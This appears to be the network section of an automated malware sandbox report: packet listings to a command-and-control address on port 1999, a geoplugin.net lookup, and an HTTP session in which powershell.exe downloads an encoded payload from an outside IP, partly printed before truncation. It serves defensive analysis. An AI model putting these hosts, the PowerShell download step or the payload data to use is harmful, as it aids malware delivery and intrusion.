                    Jul 2, 2024 07:50:56.792639017 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:56.792658091 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:56.793555975 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:56.793566942 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:56.793581009 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:56.793591976 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:56.793598890 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:56.793606997 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:56.793616056 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:56.793623924 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:56.793652058 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:56.846503973 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.027134895 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.027173042 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.027187109 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.027232885 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.027448893 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.027497053 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.027626991 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.027638912 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.027654886 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.027666092 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.027681112 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.027687073 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.027704954 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.028343916 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.028357029 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.028367996 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.028393030 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.028412104 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.028974056 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.028985977 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.028997898 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.029010057 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.029022932 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.029032946 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.029042006 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.029086113 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.029769897 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.029782057 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.029793978 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.029805899 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.029817104 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.029824972 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.029848099 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.030781984 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.030798912 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.030811071 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.030822039 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.030831099 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.030843019 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.030853033 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.030864000 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.030877113 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.031742096 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.031754017 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.031766891 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.031779051 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.031793118 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.031799078 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.031810999 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.031820059 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.031836987 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.032779932 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.032792091 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.032804012 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.032818079 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.032824993 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.032835960 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.032841921 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.032851934 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.032877922 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.033771992 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.033782959 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.033795118 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.033807993 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.033816099 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.033827066 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.033833981 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.033845901 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.033865929 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.034708023 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.034718990 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.034730911 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.034748077 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.034753084 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.034765005 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.034776926 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.034804106 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.035696983 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.035708904 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.035720110 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.035732985 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.035739899 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.035752058 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.035763979 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.035774946 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.035782099 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.035820007 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.036699057 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.036710978 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.036722898 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.036736012 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.036746979 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.036755085 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.036767006 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.036791086 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.037657976 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.037672043 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.037683010 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.037693977 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.037702084 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.037714958 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.037728071 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.037763119 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.038630009 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.038642883 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.038654089 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.038666010 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.038681984 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.038688898 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.038702011 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.038711071 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.038718939 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.038738966 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.039736032 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.039748907 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.039760113 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.039772987 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.039781094 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.039791107 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.039800882 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.039808989 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.039829016 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.040644884 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.040657997 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.040672064 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.040687084 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.040692091 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.040700912 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.040709019 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.040719032 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.040745020 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.041522980 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.041534901 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.041546106 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.041558027 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.041569948 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.041583061 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.041594028 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.041601896 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.041625977 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.042422056 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.042433977 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.042445898 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.042457104 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.042465925 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.042483091 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.042490005 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.042501926 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.042522907 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.042985916 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.043271065 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.043282986 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.043299913 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.043309927 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.043319941 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.043333054 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.043340921 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.043350935 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.043370008 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.044168949 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.044182062 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.044193983 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.044208050 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.044214964 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.044226885 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.044234991 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.044244051 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.044251919 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.045047998 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.045059919 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.045072079 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.045089006 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.045108080 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.048568964 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.116019011 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.116048098 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.116059065 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.116087914 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.116209030 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.116220951 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.116233110 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.116244078 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.116252899 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.116272926 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.158997059 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.287389994 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.287435055 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.287448883 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.287482023 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.287765980 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.287780046 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.287791967 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.287806034 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.287813902 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.287834883 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.288398027 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.288409948 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.288422108 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.288434982 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:50:57.288444996 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.288466930 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:50:57.330921888 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:51:00.140585899 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:51:00.145694971 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.145714998 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.145725965 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.145735025 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.145742893 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.145752907 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.145761967 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.145776987 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:51:00.145793915 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.145802975 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.145816088 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:51:00.145925999 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.151932001 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.152017117 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.152026892 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.152038097 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.152045965 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.152077913 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.153681993 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.232712984 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:51:00.237894058 CEST199949709103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:00.237955093 CEST497091999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:51:03.370800018 CEST199949708103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:03.372072935 CEST497081999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:51:03.377171040 CEST199949708103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:06.012656927 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:51:33.380379915 CEST199949708103.237.87.32192.168.2.7
                    Jul 2, 2024 07:51:33.381941080 CEST497081999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:51:33.386830091 CEST199949708103.237.87.32192.168.2.7
                    Jul 2, 2024 07:52:03.392513037 CEST199949708103.237.87.32192.168.2.7
                    Jul 2, 2024 07:52:03.395106077 CEST497081999192.168.2.7103.237.87.32
                    Jul 2, 2024 07:52:03.399916887 CEST199949708103.237.87.32192.168.2.7

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jul 2, 2024 07:50:52.726406097 CEST5323853192.168.2.71.1.1.1
                    Jul 2, 2024 07:50:52.733591080 CEST53532381.1.1.1192.168.2.7

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Jul 2, 2024 07:50:52.726406097 CEST192.168.2.71.1.1.10x26c8Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Jul 2, 2024 07:50:52.733591080 CEST1.1.1.1192.168.2.70x26c8No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • 103.237.86.247
                    • geoplugin.net

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.749700103.237.86.24780720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    TimestampBytes transferredDirectionData
                    Jul 2, 2024 07:50:06.081440926 CEST171OUTGET /Teentsier.lpk HTTP/1.1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                    Host: 103.237.86.247
                    Connection: Keep-Alive
                    Jul 2, 2024 07:50:07.757395983 CEST1236INHTTP/1.1 200 OK
                    Content-Type: application/octet-stream
                    Last-Modified: Mon, 01 Jul 2024 07:42:49 GMT
                    Accept-Ranges: bytes
                    ETag: "cd8162458acbda1:0"
                    Server: Microsoft-IIS/8.5
                    Date: Tue, 02 Jul 2024 05:50:02 GMT
                    Content-Length: 459660
                    Data Raw: 63 51 47 62 63 51 47 62 75 77 76 62 44 41 42 78 41 5a 74 78 41 5a 73 44 58 43 51 45 63 51 47 62 63 51 47 62 75 56 30 79 7a 72 68 78 41 5a 74 78 41 5a 75 42 38 66 35 75 66 75 2f 72 41 71 78 6f 63 51 47 62 67 65 6d 6a 58 4c 42 58 36 77 4b 4b 6e 58 45 42 6d 33 45 42 6d 2b 73 43 66 37 36 36 52 49 2b 32 72 6e 45 42 6d 33 45 42 6d 2b 73 43 4a 38 54 72 41 74 73 74 4d 63 70 78 41 5a 76 72 41 6a 35 53 69 52 51 4c 36 77 49 2f 78 2b 73 43 67 4f 62 52 34 75 73 43 68 4f 6c 78 41 5a 75 44 77 51 54 72 41 6e 71 63 36 77 49 78 63 59 48 35 74 51 63 31 42 48 7a 49 36 77 4a 66 44 58 45 42 6d 34 74 45 4a 41 52 78 41 5a 76 72 41 6b 2b 35 69 63 50 72 41 70 6c 79 36 77 4b 75 59 34 48 44 34 54 4b 35 41 75 73 43 46 33 74 78 41 5a 75 36 6a 33 66 42 4b 6e 45 42 6d 33 45 42 6d 34 48 79 2b 45 6b 55 70 58 45 42 6d 33 45 42 6d 34 48 43 69 63 45 71 63 4f 73 43 59 33 35 78 41 5a 74 78 41 5a 76 72 41 69 61 57 63 51 47 62 36 77 4c 31 4a 49 73 4d 45 4f 73 43 41 56 52 78 41 5a 75 4a 44 42 50 72 41 67 79 75 63 51 47 62 51 6e 45 42 6d 2b [TRUNCATED]
                    Data Ascii: cQGbcQGbuwvbDABxAZtxAZsDXCQEcQGbcQGbuV0yzrhxAZtxAZuB8f5ufu/rAqxocQGbgemjXLBX6wKKnXEBm3EBm+sCf766RI+2rnEBm3EBm+sCJ8TrAtstMcpxAZvrAj5SiRQL6wI/x+sCgObR4usChOlxAZuDwQTrAnqc6wIxcYH5tQc1BHzI6wJfDXEBm4tEJARxAZvrAk+5icPrAply6wKuY4HD4TK5AusCF3txAZu6j3fBKnEBm3EBm4Hy+EkUpXEBm3EBm4HCicEqcOsCY35xAZtxAZvrAiaWcQGb6wL1JIsMEOsCAVRxAZuJDBPrAgyucQGbQnEBm+sCoteB+sDMBAB11XEBm3EBm4lcJAzrAkkfcQGbge0AAwAAcQGbcQGbi1QkCHEBm+sCchOLfCQE6wLAIOsC41KJ63EBm3EBm4HDnAAAAOsC3gFxAZtTcQGb6wLUSGpAcQGb6wKSqYnrcQGbcQGbx4MAAQAAAPBEBHEBm3EBm4HDAAEAAOsCcOVxAZtTcQGb6wLx2YnrcQGbcQGbibsEAQAAcQGbcQGbgcMEAQAAcQGbcQGbU+sCllDrAsTnav/rAnBZcQGbg8IF6wL94XEBmzH26wLBxXEBmzHJ6wJ8mnEBm4sacQGbcQGbQXEBm+sCEX45HAp18+sC9V3rAmv8RusCrfpxAZuAfAr7uHXccQGb6wIHS4tECvxxAZtxAZsp8HEBm3EBm//ScQGbcQGbusDMBABxAZtxAZsxwHEBm+sCqBKLfCQM6wLmK+sCZGeBNAdIo+vJ6wJqkXEBm4PABOsCRGRxAZs50HXkcQGbcQGbiftxAZvrAsXw/9dxAZvrAnhTzESNTIjFbhnBRiyM0IfA/fgirlGzhR6rydZzGnkBu0g9Oyepw+CnNgU7njMdKg5MmxpznoGBajjkW/JJcGBqIMXzlFDJSmSXGaosjUWjtzbeU9IQyc/myS/K5MdwVmqlRaNm5ppXao1Fo3
                    Jul 2, 2024 07:50:07.757420063 CEST1236INData Raw: 4e 51 41 72 47 4e 54 49 6f 69 4b 6d 63 37 57 65 68 49 6f 51 6d 59 4d 30 74 6b 62 68 74 4a 6f 2b 75 36 75 6c 73 35 54 4a 49 69 52 68 74 4a 6f 2b 74 53 57 41 77 76 53 4d 31 78 36 73 6c 49 78 36 30 36 6e 43 4a 75 47 30 6d 6a 36 2f 57 52 59 66 66 79
                    Data Ascii: NQArGNTIoiKmc7WehIoQmYM0tkbhtJo+u6uls5TJIiRhtJo+tSWAwvSM1x6slIx606nCJuG0mj6/WRYffyxXHqyUjWcEiyvznrAMVuGnFhQrUxNe2vcXlrNHfFbhouJiFAzdvqyUgiEJz7wJjxgCp2hUmj6/SFMWagcF+4TZBL3whMo7hynqz03stYxcbG5VPNSPhijAwmOa9xaQJIN6frr816ZEwsouvJzHqDp6V/GSEpK+/Jw
                    Jul 2, 2024 07:50:07.757437944 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                    Jul 2, 2024 07:50:07.757580042 CEST1236INData Raw: 79 34 63 66 49 4a 6d 58 59 53 31 75 53 52 6c 4b 4b 56 6e 66 65 77 2f 6b 2f 42 2f 34 67 75 50 58 6d 70 4e 77 4e 78 61 4c 4a 4e 72 76 6c 71 4a 77 35 78 53 68 66 4a 56 61 72 6f 38 39 2b 38 64 6d 59 4c 37 55 4c 4a 56 4c 7a 73 63 47 56 71 50 71 36 4f
                    Data Ascii: y4cfIJmXYS1uSRlKKVnfew/k/B/4guPXmpNwNxaLJNrvlqJw5xShfJVaro89+8dmYL7ULJVLzscGVqPq6Ozl7JVKOfU3li1jtbfpR2tT44Pxy6wDy8FnfqVwiXNK18gxciHasT5Jya8zfaeg4iKBbE2T1IozJDjUYiGCtcSuWY1CoKyFE+jUyG2/7Cq1jo9Dtvk8Vk7skACORq+oOMPH+ifW8vEVUsbBOs6xYDo+vOgFBMjKi6H
                    Jul 2, 2024 07:50:07.757673025 CEST896INData Raw: 76 31 62 62 56 33 74 6f 58 35 6e 4d 6c 4e 62 49 4e 44 68 6d 6f 6e 36 53 73 79 39 38 6c 6c 31 32 57 61 72 62 32 65 39 33 44 6d 37 30 77 69 42 43 53 65 6a 76 4e 49 70 77 4e 57 50 71 4d 71 37 4b 67 4c 77 51 58 4b 47 4b 6d 6c 47 51 7a 78 42 6e 33 5a
